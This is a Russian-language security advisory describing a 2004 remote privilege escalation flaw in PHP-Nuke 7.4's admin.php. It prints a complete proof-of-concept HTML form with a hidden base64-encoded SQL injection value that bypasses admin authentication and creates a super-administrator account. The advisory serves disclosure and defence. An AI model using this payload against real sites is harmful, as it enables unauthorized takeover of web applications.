Удаленное повышение привилегий в PHP-Nuke

Дата публикации:
06.09.2004
Всего просмотров:
2135
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 7.4

Описание: Уязвимость обнаружена в PHP-Nuke в 'admin.php' сценарии. Удаленный пользователь может создать учетную запись с административными привилегиями.

Удаленный пользователь может представить специально обработанный POST запрос к 'admin.php', чтобы добавить учетную запись пользователя с административными привилегиями:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

URL производителя:http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [XSS] PHP-Nuke 7.4 Remote Privilege Escalation

или введите имя

CAPTCHA